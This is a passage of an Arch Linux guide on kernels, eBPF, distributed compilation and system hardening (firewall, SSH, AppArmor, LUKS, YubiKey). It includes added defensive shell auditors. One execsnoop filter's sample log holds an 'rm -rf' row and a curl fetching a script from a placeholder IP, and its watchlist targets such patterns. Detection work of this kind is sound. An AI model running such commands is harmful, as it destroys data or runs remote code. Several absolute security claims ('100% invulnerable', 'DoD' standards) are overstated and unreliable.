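net.ipv4.tcp_fastopen = 3
net.ipv4.tcp_ecn = 1
EOF

# Constructed sample with two common mistakes: fq_codel under BBR, and a
# later line that silently overrides tcp_fastopen with a non-numeric value.
BAD_CONF=$(mktemp)
cat > "$BAD_CONF" <<'EOF'
net.core.default_qdisc = fq_codel
net.ipv4.tcp_congestion_control = bbr
net.ipv4.tcp_fastopen = 3
net.ipv4.tcp_fastopen = yes
EOF

# sysctl_conf_get FILE KEY: value of KEY in FILE, last assignment wins,
# comments (# or ;) ignored, surrounding whitespace trimmed.
sysctl_conf_get() {
  awk -F'=' -v k="$2" '
    /^[ \t]*[#;]/ || NF < 2 { next }
    { key = $1; gsub(/[ \t]/, "", key)
      if (key == k) { v = $2; sub(/^[ \t]+/, "", v); sub(/[ \t]+$/, "", v); val = v } }
    END { print val }' "$1"
}

# tfo_describe VALUE: decode the tcp_fastopen bitmask (bit 1 = client, bit 2 = server).
tfo_describe() {
  case $1 in ''|*[!0-9]*) echo "invalid"; return 1 ;; esac
  c=$(( $1 & 1 )); s=$(( $1 & 2 ))
  if [ "$c" -ne 0 ] && [ "$s" -ne 0 ]; then echo "client+server"
  elif [ "$c" -ne 0 ]; then echo "client"
  elif [ "$s" -ne 0 ]; then echo "server"
  else echo "off"; fi
}

# audit_bbr_conf FILE: returns 0 when the fragment is consistent, 1 otherwise,
# printing one WARN line per problem found.
audit_bbr_conf() {
  f=$1; rc=0
  cc=$(sysctl_conf_get "$f" net.ipv4.tcp_congestion_control)
  qd=$(sysctl_conf_get "$f" net.core.default_qdisc)
  tfo=$(sysctl_conf_get "$f" net.ipv4.tcp_fastopen)
  ecn=$(sysctl_conf_get "$f" net.ipv4.tcp_ecn)
  if [ "$cc" = bbr ] && [ "$qd" != fq ]; then
    echo "WARN: tcp_congestion_control=bbr needs default_qdisc=fq, found '${qd:-unset}'"; rc=1
  fi
  if [ -n "$tfo" ] && ! tfo_describe "$tfo" >/dev/null; then
    echo "WARN: tcp_fastopen='$tfo' is not a numeric bitmask"; rc=1
  fi
  case $ecn in ''|0|1|2) ;; *) echo "WARN: tcp_ecn='$ecn' is outside 0..2"; rc=1 ;; esac
  return $rc
}

# bbr_available: on a live Arch box, check that the running kernel offers bbr
# (the tcp_bbr module may need loading first); silently false elsewhere.
bbr_available() {
  f=/proc/sys/net/ipv4/tcp_available_congestion_control
  [ -r "$f" ] && grep -qw bbr "$f"
}

echo "good sample:"; audit_bbr_conf "$GOOD_CONF" && echo "  ok (tcp_fastopen: $(tfo_describe 3))"
echo "bad sample:";  audit_bbr_conf "$BAD_CONF"  || echo "  fix before running sysctl --system"
```

Point audit_bbr_conf at your real /etc/sysctl.d/99-bbr.conf before applying it; a warning there means the kernel would quietly keep cubic, or ignore the bad value, rather than fail loudly.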
Chapter 12: Custom Kernels and Modular Architecture ↑ Home
In its strictest definition, "Linux" is not the operating system you're using (your full operating system is Arch, or more technically, a variant of GNU/Linux). Linux is exclusively the kernel: a megabyte of compiled code that holds absolute privileges (Ring 0) over the CPU and memory. It manages processes and translates commands from the mouse or hard drive into electrical impulses that the hardware can understand.
Arch Linux uses a modular monolithic Linux kernel. This means it's a single huge block of code that loads at startup, but it has the magical ability to hot-swap "modules" (network drivers, Bluetooth) while the PC is running (via modprobe), without requiring restarts.
Understanding, managing, and even compiling your own kernels instead of accepting the default one marks the definitive transition to mastery in UNIX systems.
12.1 The Four Horsemen: Official Arch Kernels ↑ Home
The Arch Linux organization pre-compiles and officially distributes four flavors of the Linux kernel. Having multiple kernels installed on your hard drive simultaneously is not only possible, it's the official recommendation. If a critical software update introduces a kernel panic bug, you can simply select your backup kernel on the next boot (from GRUB) and instantly resume your work.
12.1.1 Linux (The Vanilla Rolling Release)
sudo pacman -S linux linux-headers
This is the default installed package. It directly follows Linus Torvalds' stable tree and contains a conservative balance of patches. It's your daily workhorse. (Technical note: the -headers package is mandatory. It contains the C header files and interfaces that programs like VirtualBox or NVIDIA's DKMS modules need to compile their own modules against your kernel version.)
12.1.2 linux-lts (Long Term Support - The Lifesaver)
sudo pacman -S linux-lts linux-lts-headers
Linux development moves fast. A major version is released approximately every 10 weeks (e.g., from 6.8 to 6.9). If you use the linux kernel, you'll be subject to those massive jumps: if an Intel network code update in 6.9 breaks your Wi-Fi card, your life will be miserable. Once a year, Torvalds and Greg Kroah-Hartman designate a version as LTS. This version (e.g., 6.6) is frozen and receives only security patches for 2 to 6 years. Installing the LTS kernel as a backup is mandatory. If you're using Arch as a server (VPS), this is the only kernel you should boot.
12.1.3 linux-zen (Real-Time Response and Latency)
sudo pacman -S linux-zen linux-zen-headers
Developed by the community (based on the historic Liquorix project), zen is heavily patched with one clear goal in mind: extreme interactivity on the desktop and in gaming. While a standard server kernel (LTS) is designed to process massive blocks of data (e.g., a database server) by giving a single process hundreds of milliseconds of uninterrupted processor time (high throughput/batching), the Zen kernel is hyperactive and eager. It uses low-latency schedulers that slice CPU time into tiny time slices. The result? If you push your CPU to 100% rendering a 4K video and you move your mouse, the Zen kernel will interrupt the rendering for half a microsecond to process your mouse movement and draw the graphical interface. Your PC feels silky smooth, even under crushing stress.
12.1.4 linux-hardened (For Security Paranoids)
sudo pacman -S linux-hardened linux-hardened-headers
This kernel includes a massive external security patch set (from high-security Android projects like GrapheneOS). It closes hundreds of theoretical backdoors, prevents user-space code from accidentally reaching kernel memory (strengthening KASLR), and restricts BPF for unprivileged users. The downside: system performance drops by 3% to 10%, and programs like VirtualBox often won't work correctly. Ideal if you're going to give talks at hacker conventions like DEFCON or use untrusted public Wi-Fi networks.
12.2 Internal Management: Initramfs and Pacman Hooks ↑ Home
When you installed the linux-zen package and 200 megabytes of data landed on disk, some silent magic happened under the hood, for which you are entirely responsible. A kernel can't boot from a complex disk layout (like an NVMe drive formatted with Btrfs or encrypted with LUKS) because the kernel needs the Btrfs driver to read the drive... but the driver is on the drive itself. A vicious circle.
The solution is Initramfs (Initial RAM File System). It's a compressed mini-operating system (about 15MB in size) that the boot manager (GRUB) loads into RAM along with the kernel. It contains disk decryption tools, LVM support, and basic bash commands. From there, the kernel boots up and transfers control to your main hard drive.
12.2.1 The Generator: mkinitcpio
By default, Arch uses the program mkinitcpio (a pure bash script) to generate these initramfs files. (Fedora uses dracut, which is also supported in Arch.)
When pacman installs a new kernel (e.g., an update of linux-lts), you'll notice it triggers a "hook" (an automatic action). This hook calls mkinitcpio, which analyzes your current configuration (detects whether you use Ext4, USB keyboards, graphics cards), builds and compresses an initramfs-linux-lts.img tailored to your machine, and drops it in /boot.
12.2.2 Adding Early KMS Modules
One of the essential optimizations for the modern user is a clean visual transition (without black screen flashes) from the GRUB menu to your desktop, enabling high-resolution graphics from the very beginning. This is achieved by embedding your graphics card's large driver (which normally lives under /lib/modules/ on your disk) directly in the initramfs in RAM.
Open the builder's configuration file:
sudo nano /etc/mkinitcpio.conf
Find the MODULES=() array. If you have integrated Intel graphics, add i915; if you use AMD, add amdgpu; if you use NVIDIA, add nvidia nvidia_modeset nvidia_uvm nvidia_drm.
MODULES=(amdgpu)
Since we've altered the way the initramfs is built, we need to manually regenerate the images of all our installed kernels. Run the following bulk command:
sudo mkinitcpio -P
12.3 The Master Level: Compiling a Custom Kernel (linux-tkg) ↑ Home
If you're a purist, you can download Linus Torvalds' C source code from kernel.org and use the dreaded make menuconfig (a blue text menu in the style of 1990s MS-DOS with over 10,000 cryptic kernel parameters) followed by a brutal make -j16.
However, compiling a kernel by hand and packaging it for pacman in a clean and uninstallable way requires writing PKGBUILDs of hundreds of lines. The contemporary "Arch" way of compiling ultra-optimized hand-built kernels (especially for gaming and low latency) is to use community orchestration tools, with Frogging-Family/linux-tkg being the most revered.
12.3.1 TKG Deployment
The linux-tkg project offers a wrapper script that downloads the kernel code, applies dozens of exclusive patches not found in the official Torvalds kernel (extreme and experimental optimizations that the official team considers too aggressive or unstable), and automates the compilation with makepkg.
- Clone the repository from GitHub (never as root):
git clone https://github.com/Frogging-Family/linux-tkg.git
cd linux-tkg
- Open the file customization.cfg and read the options with amazement. Here you can choose the process scheduler algorithm (BORE, PDS, BMQ, CacULE). BORE, for example, is a scheduler that massively prioritizes video games over background system processes. You can also enable LTO and disable all kernel debugging features (debug symbols) to speed up boot time.
- Run the Arch builder (which will call the tkg script):
makepkg -si
The Amazing Power of localmodconfig
During the tkg interactive installer, the script will ask if you want to use localmodconfig. If you say yes, the build will look at the state of your hardware RIGHT NOW. It will see that you have a Logitech mouse, a Ducky keyboard, and Intel Wi-Fi, and ignore the code for Razer mice, Xbox controllers, Chinese webcams from 1999, and IBM server satellite dishes. The massive 150MB vanilla kernel will be compiled into a concentrated, minuscule, and pure kernel of just 20MB that understands only the hardware universe in your own room, and nothing else. It will boot in fractions of a second and consume a pittance of RAM.
(Final warning: if you compile your kernel with localmodconfig and tomorrow you buy a Wi-Fi card from another brand or a PS5 controller and plug it in via USB, your microscopic kernel won't know what they are, it won't have the modules, and the devices won't work. You'll have to plug them in and recompile the kernel with them connected.)
After compilation and updating your GRUB (grub-mkconfig -o /boot/grub/grub.cfg), you will restart the machine and be running a system where even the lowest fibers of metal and silicon bend exactly to your needs.
12.4 Crossing the Border: eBPF (Extended Berkeley Packet Filter) ↑ Home
Imagine your Arch Linux system is struggling. A mysterious process is writing to the hard drive at 100 MB/s, and user tools like htop can't tell you who it is or what exact file it's writing, because the process is born and dies within a millisecond (e.g., a corrupted cron job). Touching or debugging Ring 0 is terrifying: if the kernel stops, the PC goes into a kernel panic.
The modern technology that has revolutionized kernel analysis is called eBPF. It's a sandboxed virtual machine embedded in the very heart of the Linux kernel. It allows system administrators to inject microprograms written in (restricted) C that hook into internal kernel functions on the fly. If the injected program has a bug (an infinite loop or an attempt to read memory it shouldn't), the kernel's eBPF verifier rejects it before it ever runs, so the server never crashes.
12.4.1 Installation of eBPF Audit Tools
You don't need to be a kernel programmer to use eBPF. You can install the BCC tool collection and bpftrace, which come with dozens of ready-made scripts.
sudo pacman -S bcc-tools bpftrace
12.4.2 Practical Diagnosis of Syscalls
For example, if you suspect that a mysterious process is consuming disk bandwidth, we'll use the eBPF-based script biosnoop. It hooks the kernel's block I/O requests:
sudo /usr/share/bcc/tools/biosnoop
When you press Enter, the terminal will wait and print, with millisecond timestamps, the PID, the application name, the physical disk sector, and the exact number of bytes being written.
Do you want to see whether someone on the server is secretly running rm -rf (delete everything)?
sudo /usr/share/bcc/tools/execsnoop
It will list in real time EVERY command (even hidden ones with a half-second lifespan) executed by any user. eBPF grants omnipresent power over the machine: godlike visibility into the code running at the kernel level.
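The raw execsnoop stream is only useful if something reads it. The shell snippet below is an added example (not from the original book or the BCC project) that parses execsnoop-style output (the PCOMM PID PPID RET ARGS columns bcc's execsnoop prints) and flags the case the section worries about, an rm with both recursive and force options, plus the common companion pattern of curl or wget fetching a remote URL. The sample rows are constructed and the function names are my own.

```shell
#!/bin/sh
# Added example: filter execsnoop output for the commands the section worries about.
# Column layout follows bcc's execsnoop (PCOMM PID PPID RET ARGS); sample rows are
# constructed for this example and the function names are my own.

SAMPLE_EXECSNOOP='PCOMM            PID    PPID   RET ARGS
bash             3124   3100     0 /usr/bin/ls -la /home/alice
rm               3127   3126     0 /usr/bin/rm -rf /srv/backups
sshd             3129   1024     0 /usr/bin/sshd -R
curl             3130   2201     0 /usr/bin/curl -s http://203.0.113.10/x.sh
php              3131   1200     0 /usr/bin/php /srv/www/cron.php
rm               3132   3100     0 /usr/bin/rm -f /tmp/cache.lock'

# execsnoop_flag: read execsnoop lines on stdin, print "PID PCOMM ARGS" for every
# row that matches the watchlist. Exit status 0 if anything was flagged, 1 otherwise.
# Watchlist (extend as needed):
#   - rm invoked with both a recursive (-r/-R/--recursive) and a force (-f/--force) option
#   - curl/wget fetching an http(s) URL (the classic "fetch and run" helper)
execsnoop_flag() {
  awk '
    NR == 1 && $1 == "PCOMM" { next }          # header row
    NF < 5 { next }                            # malformed or blank line
    {
      pcomm = $1; pid = $2; args = $5
      for (i = 6; i <= NF; i++) args = args " " $i
      cmd = $5; sub(/.*\//, "", cmd)          # basename of the executed binary
      flagged = 0
      if (cmd == "rm") {
        rec = 0; frc = 0
        for (i = 6; i <= NF; i++) {
          if ($i == "--recursive" || ($i ~ /^-[a-zA-Z]+$/ && $i ~ /[rR]/)) rec = 1
          if ($i == "--force"     || ($i ~ /^-[a-zA-Z]+$/ && $i ~ /f/))    frc = 1
        }
        flagged = rec && frc
      } else if ((cmd == "curl" || cmd == "wget") && args ~ /https?:\/\//) {
        flagged = 1
      }
      if (flagged) { print pid, pcomm, args; n++ }
    }
    END { exit (n > 0 ? 0 : 1) }'
}

# execsnoop_flag_count: number of flagged rows on stdin (0 when nothing matched).
execsnoop_flag_count() {
  execsnoop_flag | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_EXECSNOOP" | execsnoop_flag
```

On a live system the same function reads the tool directly: sudo /usr/share/bcc/tools/execsnoop | execsnoop_flag. The rm check looks at the option words rather than the literal string "rm -rf", so "rm -fr" and "rm -r -f" are caught and the harmless "rm -f file" is not.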
12.5 Industrial Compilation: ccache and distcc (Server Grade) ↑ Home
As we saw when generating hyper-optimized kernels (Chapter 12.3) with the -march=native flag, compiling millions of lines of C/C++ code (whether a custom kernel, the Chromium browser, or an entire base operating system) demands 100% of the processor's resources for hours. If you compile the kernel on a lightweight laptop, it will likely shut down from overheating.
To overcome the physical limitations of silicon, we use two fundamental tools from enterprise development.
12.5.1 The Compilation Cache (ccache)
If you compile the kernel today (version 6.10.1) and security update 6.10.2 is released tomorrow, 99.9% of the C files will remain unchanged. It would be foolish for makepkg to translate those files again. Ccache is a program that wraps GCC. When you compile a file, ccache saves the result in a hidden database (~/.ccache/). If tomorrow you compile a file with exactly the same content, ccache discards the compiler invocation, goes to its database, extracts the pre-computed object and injects it in milliseconds.
sudo pacman -S ccache
To make makepkg use it, edit /etc/makepkg.conf: search for the BUILDENV=() variable and remove the exclamation mark in front of ccache to enable it:
BUILDENV=(!distcc color ccache check !sign)
The first compilation of a TKG kernel will take 30 minutes. The second time (tomorrow's update) will take 45 seconds.
12.5.2 Distributed Network Compilation (distcc)
Imagine this scenario: You're in an office (or at home) with your (weak) quad-core laptop. But on the same local network, you have a massive (powerful) 16-core gaming desktop that's sitting idle, and maybe an old 8-core file server. Distcc lets you do build clustering.
When you run makepkg on your laptop, it will delegate the files over the TCP network to the other computers. The giant desktop will compile 16 files at a time, the old server another 8, and they will send the results back to you. Your laptop will barely break a sweat, finishing colossal compilations in record time.
- On the slave machines (the powerful PCs):
sudo pacman -S distcc
# Tell distccd which IPs (your laptop's subnet) are allowed to send it work
sudo nano /etc/conf.d/distccd
# Add: DISTCC_ARGS="--allow 192.168.1.0/24"
sudo systemctl enable --now distccd.service
- On the master machine (your laptop):
sudo pacman -S distcc
Tell your machine where its compilation servants are, in ~/.distcc/hosts:
# Desktop PC IP (16 threads) and the old server (8 threads)
192.168.1.50/16 192.168.1.60/8
- Final integration in makepkg:
Edit /etc/makepkg.conf again: enable distcc in BUILDENV and alter MAKEFLAGS to unleash the fury of all 24 combined cores across your home:
BUILDENV=(distcc color ccache check !sign)
MAKEFLAGS="-j25"
You have turned your home network into a unified Arch Linux supercomputing cluster.
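Editing BUILDENV by hand on several machines invites typos, and the -j value should follow the hosts file rather than be remembered. The shell functions below are an added example (not part of the book, makepkg or distcc) that flip an option in the BUILDENV=(...) array idempotently, sum the slots declared in a distcc hosts file (distcc's default of 4 slots applies when no /LIMIT is given, and options after a comma are ignored), and set MAKEFLAGS accordingly. They operate on constructed copies of the files, never on the live /etc/makepkg.conf, and the function names are mine.

```shell
#!/bin/sh
# Added example: helpers for the makepkg.conf / distcc hosts edits described above.
# Function names are my own; the files below are constructed copies for the demo.

# makepkg_enable_option FILE OPT: turn "!OPT" into "OPT" inside the BUILDENV=(...)
# line of a makepkg.conf. Idempotent: an already enabled OPT is left untouched.
makepkg_enable_option() {
  sed -E -i.bak "/^BUILDENV=\(/ s/(^|[ (])!$2([ )])/\1$2\2/" "$1" && rm -f "$1.bak"
}

# distcc_remote_slots HOSTSFILE: sum the job slots in a distcc hosts file.
# Entries look like HOST[/LIMIT][,options]; "#" starts a comment; a missing
# LIMIT means distcc's default of 4 jobs for that host.
distcc_remote_slots() {
  sed 's/#.*//' "$1" | tr ' \t' '\n\n' | awk -F'/' '
    $1 == "" { next }
    { limit = 4
      if (NF > 1) { sub(/,.*/, "", $2); limit = $2 + 0 }
      total += limit }
    END { print total + 0 }'
}

# makepkg_set_makeflags FILE JOBS: set (or uncomment and set) MAKEFLAGS="-jJOBS".
makepkg_set_makeflags() {
  if grep -Eq '^#?MAKEFLAGS=' "$1"; then
    sed -E -i.bak "s/^#?MAKEFLAGS=.*/MAKEFLAGS=\"-j$2\"/" "$1" && rm -f "$1.bak"
  else
    printf 'MAKEFLAGS="-j%s"\n' "$2" >> "$1"
  fi
}

# Demo on constructed copies (the real files are /etc/makepkg.conf and ~/.distcc/hosts).
DEMO=$(mktemp -d)
printf 'BUILDENV=(!distcc color !ccache check !sign)\n#MAKEFLAGS="-j2"\n' > "$DEMO/makepkg.conf"
printf '# desktop (16 threads) and old server (8 threads)\n192.168.1.50/16 192.168.1.60/8,lzo\n' > "$DEMO/hosts"

makepkg_enable_option "$DEMO/makepkg.conf" distcc
makepkg_enable_option "$DEMO/makepkg.conf" ccache
remote=$(distcc_remote_slots "$DEMO/hosts")                 # 24 for the sample above
makepkg_set_makeflags "$DEMO/makepkg.conf" $((remote + 1))  # +1 keeps one job for the laptop
cat "$DEMO/makepkg.conf"
```

The +1 reproduces the book's -j25 for the 16+8 example; if you list more hosts or change their limits, recompute rather than editing the number by hand, since a -j larger than the available slots only makes distcc queue jobs locally.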
Chapter 13: Cryptography and Advanced System Security ↑ Home
Linux is inherently secure from its inception thanks to its UNIX multi-user permission design (every privileged action requires the blessed sudo). However, Arch Linux adheres to its doctrine of doing nothing by default. Your newly installed system is an open canvas of ports. If you connect your laptop to an airport Wi-Fi network, other infected machines can probe your ports (Nmap scans). If you leave your physical PC in a coffee shop, anyone with a USB drive can boot into a chroot environment and extract your browser passwords.
This chapter elevates the technical and cryptographic security of the system from "careless consumer" to "impregnable architecture".
13.1 The Kernel Firewall (Netfilter and UFW) ↑ Home
The magic that blocks malicious network requests lives deep within the kernel, in a subsystem historically called netfilter (and its evolutions, iptables and the modern nftables). Writing nftables rules by hand is a recipe for sanity and productivity suicide. We use front-end software. The two industry giants are firewalld (complex, the standard at Red Hat) and UFW (Uncomplicated Firewall, a clean design created by Canonical for Ubuntu, perfect for personal computers).
Firewall manager installation:
sudo pacman -S ufw
13.1.1 Configuring Defense Policies (Drop and Deny)
A computer's standard paranoid policy (Default Policy) is simple: "I can call outside and nobody can call me from outside."
# Silently reject every connection that tries to enter my PC
sudo ufw default deny incoming
# Allow the browsers and games on my PC to call out (Internet)
sudo ufw default allow outgoing
Opening Ports Out of Necessity (Whitelisting): If you are a web developer (Node.js/React/Apache), you may want to see how the website temporarily hosted on your local PC looks on your mobile device (port 80 for HTTP or 3000 for Node).
sudo ufw allow 80/tcp
sudo ufw allow 3000/tcp
For a detailed breakdown of how the rules are currently configured:
sudo ufw status verbose
And finally, instruct the system to put up a permanent shield (persistent between reboots):
sudo ufw enable
sudo systemctl enable --now ufw.service
13.2 Securing the SSH Daemon (Secure Shell) ↑ Home
If you rent a VPS (Virtual Private Server) with Arch Linux in the cloud (e.g., DigitalOcean, AWS), you depend entirely on sshd to control it remotely from your PC. The OpenSSH daemon's factory configuration is criminally naive and weak for the modern internet, because it accepts password authentication.
Any PC open to the internet on port 22 receives approximately 5,000 to 10,000 brute-force attempts per day from global bot farms, which automatically test endless dictionaries (root, admin123, password) until one finds yours.
13.2.1 The Asymmetric Cryptographic Key Ecosystem
The only way to be 100% invulnerable to brute force is to disable traditional passwords and use elliptic-curve cryptography. You create a randomly generated mathematical key pair, keep the private key at home (it never leaves your physical PC), and copy the public key to the server. The SSH server will send a monstrous mathematical puzzle that only your PC (using the private key) can solve. There's no text, no guessing game.
1. Key generation on your client PC: use the Ed25519 format (a modern, ultra-secure and fast algorithm; never use outdated RSA):
ssh-keygen -t ed25519 -C "llave_servidor_arch"
(Save it in ~/.ssh/id_ed25519 and add a passphrase to encrypt the key file itself, in case your client computer is compromised.)
2. Copy to the remote machine:
ssh-copy-id -i ~/.ssh/id_ed25519.pub tu_usuario@192.168.1.100
(You will need to type the password one last time; this installs the key in the remote server's ~/.ssh/authorized_keys.)
13.2.2 Hardening the Server Configuration
On your remote server or Arch machine, open and drastically modify the SSH master rules:
sudo nano /etc/ssh/sshd_config
Search for and modify (uncommenting where needed) the following:
PasswordAuthentication no
The bot attack has just been 100% neutralized: no one can type in a text password.
PermitRootLogin no
If an attacker logs in using a stolen key, they will land in a normal user account. You prohibit direct remote login as root.
Port 2244
(Optional): if you change the standard port 22 to an obscure port, 90% of the mass bot scanners (nmap/zmap bots from Russia/China) won't even find your gateway. (Don't forget that your UFW firewall must be updated to allow the new port.)
Restart the daemon to apply the changes: sudo systemctl restart sshd.service.
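A quick way to verify the edits before you restart sshd (and possibly lock yourself out) is to read the effective values back. The shell functions below are an added example, not part of the book or of OpenSSH: they parse an sshd_config the way sshd resolves global settings (the first occurrence wins, commented lines are ignored, anything under a Match block is conditional and left alone) and grade it against the three settings above. The two sample configurations are constructed and the function names are mine. On a live Arch system, sshd -T prints the fully resolved configuration, including drop-ins pulled in by an Include line, and is the authoritative check.

```shell
#!/bin/sh
# Added example: audit an sshd_config for the hardening settings above.
# Sample configs are constructed for the example; function names are my own.

GOOD_SSHD=$(mktemp)
cat > "$GOOD_SSHD" <<'EOF'
# constructed: hardened
#PasswordAuthentication yes
PasswordAuthentication no
PermitRootLogin no
Port 2244
Match User backup
    PasswordAuthentication yes
EOF

BAD_SSHD=$(mktemp)
cat > "$BAD_SSHD" <<'EOF'
# constructed: the edit was made on a commented-out line, so it has no effect
#PasswordAuthentication no
PermitRootLogin yes
EOF

# sshd_effective FILE KEYWORD: the global value sshd would use for KEYWORD.
# sshd keeps the FIRST value it reads (later duplicates are ignored), keywords
# are case-insensitive, and lines after a Match block only apply conditionally,
# so we stop there. Prints nothing when the keyword is unset (built-in default).
sshd_effective() {
  awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
    /^[ \t]*#/ || NF < 2 { next }
    tolower($1) == "match" { exit }
    tolower($1) == key { print $2; exit }' "$1"
}

# sshd_audit FILE: print one PASS/FAIL line per check, return 1 if any FAIL.
sshd_audit() {
  f=$1; rc=0
  pa=$(sshd_effective "$f" PasswordAuthentication | tr 'A-Z' 'a-z')
  prl=$(sshd_effective "$f" PermitRootLogin | tr 'A-Z' 'a-z')
  port=$(sshd_effective "$f" Port)
  if [ "$pa" = no ]; then echo "PASS PasswordAuthentication no"
  else echo "FAIL PasswordAuthentication=${pa:-yes (built-in default)}"; rc=1; fi
  if [ "$prl" = no ]; then echo "PASS PermitRootLogin no"
  else echo "FAIL PermitRootLogin=${prl:-prohibit-password (built-in default)}"; rc=1; fi
  echo "INFO Port ${port:-22}${port:+ (remember: sudo ufw allow $port/tcp)}"
  return $rc
}

echo "--- hardened sample"; sshd_audit "$GOOD_SSHD"
echo "--- broken sample";   sshd_audit "$BAD_SSHD" || echo "do not restart sshd yet"
```

The broken sample shows the classic mistake: editing the value on a line that still starts with "#" changes nothing, and sshd keeps accepting passwords. Run sshd_audit against your real /etc/ssh/sshd_config from a second terminal that stays logged in, then restart.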
13.3 Functional Kernel Isolation with AppArmor ↑ Home
Let's say you have the best firewall in the world (UFW), but one day you visit a website and your Firefox browser silently downloads a malicious script (a zero-day exploit). The script runs locally with your permissions, and since Firefox has the right to read the photos in your Pictures folder or your SSH keys (~/.ssh), the malware will package everything up and steal it. A network firewall like UFW cannot protect you from yourself; you need local software sandboxing.
In the Linux ecosystem there is SELinux (Absolute complexity, used in Red Hat) and AppArmor (used by Ubuntu and SuSE, very intuitive).
AppArmor adds Mandatory Access Control (MAC) at Ring 0 (inside the kernel). It assigns strict "profiles" to applications, forcing them to adhere to the Principle of Least Privilege. A Firefox profile would say: "Firefox is ONLY allowed, by order of the machine's military kernel, to access the ~/Downloads folder. It is denied read access to ~/.ssh or ~/.gnupg." The attack is neutralized at its root.
13.3.1 Activation at Startup (Grub Parameters)
Install AppArmor and the gigantic set of profiles created by the Ubuntu and Debian community:
sudo pacman -S apparmor
AppArmor is not a program that starts automatically. It is a Linux Security Module (LSM) that must be enabled by the kernel at millisecond one. Open the GRUB configuration:
sudo nano /etc/default/grub
On the GRUB_CMDLINE_LINUX_DEFAULT line, add this parameter at the end:
lsm=landlock,lockdown,yama,integrity,apparmor,bpf
(We are activating a full battery of kernel security modules: yama, integrity... AppArmor is one of them.)
Regenerate the GRUB configuration: sudo grub-mkconfig -o /boot/grub/grub.cfg.
13.3.2 Activation of Demons and Auditing
When you restart your PC, the kernel will have AppArmor active and waiting for profiles. Enable the userspace loader daemon, which loads the profiles into the kernel on every boot:
sudo systemctl enable --now apparmor.service
You can check the result with the diagnostic utility aa-status. You'll see hundreds of profiles (e.g. libreoffice, evince, tcpdump) marked in enforce mode. You are protected. Any violation will generate a warning in your kernel log, dmesg.
13.4 Cryptography at Rest: The LUKS Mandate ↑ Home
The firewall repels network intrusions; AppArmor neutralizes local exploits. But if you close your laptop in a coffee shop, get up to grab some napkins, and someone snatches it, you've lost the battle. Linux (and Windows local) passwords logically live in a file (/etc/shadow). An attacker will remove the SSD from your laptop with a screwdriver, connect it to their computer, mount the filesystem ignoring your operating system, and read every photo, document and e-mail session as plain text (cleartext).
The ultimate defense in computing is Full Disk Encryption (FDE). In Linux, the subsystem is called dm-crypt and the container format is called LUKS (Linux Unified Key Setup).
Encryption takes the millions of structured bits (zeros and ones) of your Ext4, Btrfs or /home partition and, by passing them through a brutal mathematical block in your processor's core (hardware-accelerated 256-bit or 512-bit AES-XTS), turns your photos and the entire operating system into radioactive random white noise (high entropy). If your drive is removed, forensic analysts, a thief or an intelligence agency will find thousands of gigabytes of useless static. The only way to turn the noise back into pure data is the master unlock passphrase, typed at the GRUB bootloader before booting.
13.4.1 The Pragmatic Reality of Implementing LUKS
Unlike a firewall or AppArmor, which you can install on any given Tuesday, LUKS acts directly as a destructive layer below the disk formatting.
Installing LUKS on an Ext4 disk that has been in use for a year is unrealistic. It would require compressing all your data, encrypting it in place with extremely slow tools, and if the power goes out for even 1 millisecond during the 8-hour process, you'll lose the entire disk forever. The deep technical implementation of LUKS demands architectural planning during the installation process (Chapter 2 of this manual). After partitioning with cfdisk, cryptsetup luksFormat /dev/nvme0n1p3 is invoked, the mathematical container is unlocked (cryptsetup open), and only then, inside the unlocked container, is the Ext4 format applied: mkfs.ext4 /dev/mapper/root_encriptado.
If you're reading this on a laptop full of corporate secrets and you don't have LUKS, the official high-security recommendation is: back up your ~/.config folder and critical documents to a USB drive, perform a clean installation from scratch (The Arch Way with cryptography), and live in an ecosystem where a stolen drive is just a harmless piece of plastic and aluminium.
13.4.2 Final Audit (Lynis)
The system is now impenetrable at the network, process and physical disk levels. To confirm this superhuman effort by the SysAdmin, install the Lynis security auditing suite.
sudo pacman -S lynis
sudo lynis audit system
The script will scan all your daemons and files and print a Hardening Index report with recommendations (e.g., disable compilers for unprivileged users). Your Arch Linux now operates under military-grade certification standards (DoD).
13.5 Security Hardware: FIDO2 Authentication (YubiKey) ↑ Home
Even with LUKS passphrases, Ed25519 SSH keys or kernel-level protections, the weak link will always be the keyboard. If your computer is on, your drive is decrypted, and someone installs keylogger software, it will capture your sudo password every time you run sudo pacman -Syu.
In a "Zero Trust" ecosystem (the standard in corporations like Google), no key typed on a keyboard is considered secure. Maximum security requires the U2F/FIDO2 (Universal 2nd Factor) protocol. This is implemented by purchasing USB cryptographic hardware (such as a YubiKey).
This USB chip stores a private key that is impossible to physically extract (its circuit self-destructs if you try to open it).
13.5.1 Integrating YubiKey with Sudo (PAM)
In Arch Linux, we can rewrite the system-wide authentication modules (PAM - Pluggable Authentication Modules). We'll tell the system: "When I try to run sudo, ask me for my password, but IF I DON'T PHYSICALLY TOUCH the gold sensor of the USB key inserted in the machine, deny me access." A remote attacker controlling your PC from Russia won't be able to touch the physical USB key in your living room; their destructive commands will fail.
- Install the dependencies and the official Yubico PAM module:
sudo pacman -S yubico-pam libfido2
- Map your key to the current user. Insert your YubiKey and generate an association file in your home directory:
mkdir -p ~/.yubico
# This command issues a FIDO challenge that the key will answer (touch it when it blinks)
pamu2fcfg > ~/.yubico/u2f_keys
- Force sudo's behaviour:
This is a critical step. If you get it wrong, you could lock yourself out of root access. Open (with extreme caution) the sudo PAM control file:
sudo nano /etc/pam.d/sudo
Just below the line that says #%PAM-1.0, add the following instruction:
auth required pam_u2f.so
Open a new terminal without closing the current one and type sudo ls. It won't ask for a password; the console will wait. Your YubiKey will be flashing green. The instant your finger touches the key's capacitive metal, the ls command runs. If the USB key is not inserted, access is denied.
13.6 Active Defenses: Intrusion Detection System (IDS) and Expanded Fail2Ban ↑ Home
A system exposed to the internet is like a castle under constant siege. Passive firewalls (UFW Firewall, Chapter 13.1) block closed ports. But what about legitimate ports? If you host a Nextcloud server, Jellyfin, or even a simple web application on an open port, an attacker will try to exploit the application's login screen.
13.6.1 Brutal Expansion of Fail2Ban
Fail2Ban is a Python daemon that monitors log files (and the journal). When it detects too many consecutive failures from the same IP address, it dynamically inserts a rule into the firewall (UFW) to "ban" that attacker for X hours.
sudo pacman -S fail2ban
sudo systemctl enable --now fail2ban.service
By default, Fail2Ban only protects the SSH port. But we can teach it to protect any service using regular expressions (regex) in .local files.
Customized Protection (the Nextcloud case): imagine a server in the cloud whose log is /var/log/nextcloud/nextcloud.log. You create the logical filter (the pattern mask):
